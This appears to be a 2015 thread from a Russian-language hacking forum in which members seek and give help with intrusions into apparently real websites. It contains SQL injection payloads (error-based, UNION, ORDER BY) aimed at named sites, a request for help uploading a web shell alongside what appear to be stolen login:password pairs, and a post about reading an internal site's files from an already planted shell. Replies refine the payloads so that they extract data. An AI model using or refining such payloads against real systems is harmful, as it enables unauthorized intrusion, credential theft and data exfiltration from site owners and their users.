Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. sysjuk

    sysjuk Member

    Joined:
    5 Jan 2012
    Messages:
    230
    Likes Received:
    58
    Reputations:
    5
    Попробую более детально описать ситуацию.
    Есть сайт залитый шелл но права там нищенские а именно:exec,ini_get_all,parse_ini_file,passthru,php_uname,popen,proc_open,shell_exec,show_source,system
    все активные команды заблокированы.
    Есть второй сайт, который работает в локалке(из вне не доступен).
    Могу читать конфиг и.т.д этого сайта через mysql load file, но нужно узнать какие именно файлы расположены в директории этого сайта.
    Какими способами можно вообще получить такие данные, бэк не катит уже, всю голову переломал, за лучший ответ который поможет прочитать в папке этой файлы 5$ дам)

    Забыл упомянуть (48 ( apache ) Group: 513 ( ? )) из папки не выйти права 0751
     
    #24041 sysjuk, 29 Mar 2015
    Last edited: 29 Mar 2015
  2. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    попробую тогда болие корректно изложится, если прова позволяют, то можно "ПОПРОБОВАТЬ" средствами пхп просмотреть, что находится в папке!
     
    _________________________
  3. sysjuk

    sysjuk Member

    Joined:
    5 Jan 2012
    Messages:
    230
    Likes Received:
    58
    Reputations:
    5
    Хотя ты прав, сейчас попробую, скинь биткоин кошелек в личку, если все пройдет, то 5$ скину.
     
  4. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    garden4less:mango5white



    barton:aniram

    помогите шелл залить)
     
    #24044 Br@!ns, 30 Mar 2015
    Last edited: 30 Mar 2015
  5. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    При эксплуатации sql инжекта возникла проблема. всего 2 таблицы основная и Information.schema. Узнаю без проблем имена таблиц с помощью select table_name from information_schema.tables. когда пытаюсь вытащить данные с таблиц получается вот это:

    [​IMG]

    В чем может быть причина?

    мб из-за того что имя таблицы преобразовываются в верхний регистр? но тогда почему вытянулись данные с information_schema опять же.

    PS при запросе select blabla from ws_lifefitness_live_us.admin_user_owners пишет SELECT command denied to user 'user'@'localhost' for table 'ADMIN_USER_OWNERS'
     
    #24045 Br@!ns, 31 Mar 2015
    Last edited: 31 Mar 2015
  6. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Во-первых, blabla - строковая константа, а потому должна обрамляться кавычками с двух сторон для корректности запроса.

    Если blabla - реально существуюший стобец, тогда не надо. Но я подозреваю, что он не существует.

    Во-вторых, я полагаю что в твоей схеме не существует такой таблицы. При вытаскивании данных желательно использовать полный адрес для таблицы типа "information_schema.tables". примеры - my_database.my_table , `my_database`.my_table , `my_database`.`my_table`
     
    _________________________
  7. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    нашел выход в нахождении другой sql, вопрос решен.
     
    #24047 Br@!ns, 31 Mar 2015
    Last edited: 31 Mar 2015
  8. sysjuk

    sysjuk Member

    Joined:
    5 Jan 2012
    Messages:
    230
    Likes Received:
    58
    Reputations:
    5
    '+and+(SeLeCt+1+FrOm(SeLeCt+count(*),CoNcAt((SeLeCt(SeLeCt(SeLeCt+CoNcAt(char(33,126,33),MAIN_PASSWORD,char(33,126,33))+FrOm+currency+LiMiT+15,1))+FrOm+information_schema.TaBlEs+LiMiT+0,1),floor(rand(0)*2))x+FrOm+information_schema.TaBlEs+GrOuP+By+x)a)+and+'1'='1
    выводит: Subquery returns more than 1 row
    как правильно составить)?
     
  9. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    свой вывод помести в group_concat(). и пользуйся поиском, пару страниц назад такой вопрос уже был
     
    _________________________
  10. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    http://www.menschenrechte.ac.at/db/suche/bib_erg.php
    post запрос
    PHP:
    schlag1=--+Bitte+ausw%E4hlen+--&op1=AND&schlagtext2=&schlag2=--+Bitte+ausw%E4hlen+--&op2=ANDschlag3=--+Bitte+ausw%E4hlen+--&bib_suche=Suche+starten&autor=aaa'
    Помогите раскрутить...
     
  11. sysjuk

    sysjuk Member

    Joined:
    5 Jan 2012
    Messages:
    230
    Likes Received:
    58
    Reputations:
    5
    Все мануалы прокурил не могу составить, завис к тому же на ошибке: Operand should contain 1 column(s).
    Можешь все же помочь с составлением правильного запроса?!

    Все решил задачу эту, спасибо.
     
    #24051 sysjuk, 3 Apr 2015
    Last edited: 4 Apr 2015
  12. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    Здраствуйте! Хочу спросить, есть ли возможность обойти limit в скулях, что б вывелось все сразу.
    Например даю запрос
    union select 1,2,login from users limit 1,1
    Выводить одну запись, можно зделать запрос что б вывело несколько?
     
  13. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    group_concat(login)
     
    _________________________
  14. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    спасибо!
     
  15. billybonse

    billybonse Member

    Joined:
    9 Oct 2011
    Messages:
    55
    Likes Received:
    7
    Reputations:
    1
    Нашел скулю, запрос http://xxx.com/cat/15?order=id&order_type=DESC

    Делаю такой запрос /cat/15?order=id union select 1--&order_type=DESC
    Выводит

    A Database Error Occurred
    Error Number: 1221

    Incorrect usage of UNION and ORDER BY
    SELECT * FROM (`items`) WHERE `category` = '15' AND `sold` = '0' ORDER BY `id` union select 1-- DESC LIMIT 50

    Помогите дальше раскрутить.
     
  16. billybonse

    billybonse Member

    Joined:
    9 Oct 2011
    Messages:
    55
    Likes Received:
    7
    Reputations:
    1
    единственное, что сам сделал, так это
    15?order=(id*1) и 15?order=(id*-1)
    но вытащить никакие данные не могу
     
  17. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    может стоит начать со статей по sqli? можно, заодно, пройти челлендж, чтобы лучше понять https://forum.antichat.ru/threads/423579/
     
    _________________________
  18. billybonse

    billybonse Member

    Joined:
    9 Oct 2011
    Messages:
    55
    Likes Received:
    7
    Reputations:
    1
    Спасибо за совет, статьи читал конечно же, в гугле смотрел, но сам не смог разобраться, поэтому и спросил в этой теме.
     
  19. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    уязвимый параметр в ORDER BY. крутить либо как blind, либо https://rdot.org/forum/showthread.php?t=2865, либо, добавив LIMIT, использовать это: https://rdot.org/forum/showpost.php?p=36186&postcount=30
     
    _________________________
    banned likes this.
  20. billybonse

    billybonse Member

    Joined:
    9 Oct 2011
    Messages:
    55
    Likes Received:
    7
    Reputations:
    1
    faza02, это я понял, не могу сформировать запрос чтобы дальше крутить
     
Thread Status:
Not open for further replies.